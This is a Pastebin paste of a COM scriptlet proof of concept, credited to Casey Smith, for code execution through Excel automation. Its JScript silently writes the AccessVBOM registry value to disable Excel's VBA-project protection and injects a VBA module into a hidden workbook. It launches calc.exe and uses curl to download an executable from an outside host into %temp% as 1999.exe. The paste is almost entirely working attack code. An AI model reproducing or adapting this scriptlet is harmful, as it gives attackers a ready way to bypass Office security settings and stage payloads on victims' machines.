SHARE
TWEET

Untitled

a guest Apr 20th, 2019 100 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?XML version="1.0"?>
  2. <scriptlet>
  3. <registration
  4.     progid="CalcShellcode"
  5.     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
  6.     <!-- Proof Of Concept - Casey Smith @subTee -->
  7.     <!-- Orginal Shellcode Example : https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ -->
  8.     <script language="JScript">
  9.         <![CDATA[
  10.    
  11.             var objExcel = new ActiveXObject("Excel.Application");
  12.             objExcel.Visible = false;
  13.             var WshShell = new ActiveXObject("WScript.Shell");
  14.             var Application_Version = objExcel.Version;//Auto-Detect Version
  15.             var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
  16.             WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
  17.             var objWorkbook = objExcel.Workbooks.Add();
  18.             var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
  19.             WshShell.Run("calc.exe");
  20.            
  21.             var oShell = new ActiveXObject("WScript.Shell");
  22.             oShell.Run("curl -o %temp%\\1999.exe https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe");  
  23.            
  24.             objExcel.DisplayAlerts = false;
  25.             objWorkbook.Close(false);
  26.    
  27.         ]]>
  28. </script>
  29. </registration>
  30. </scriptlet>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top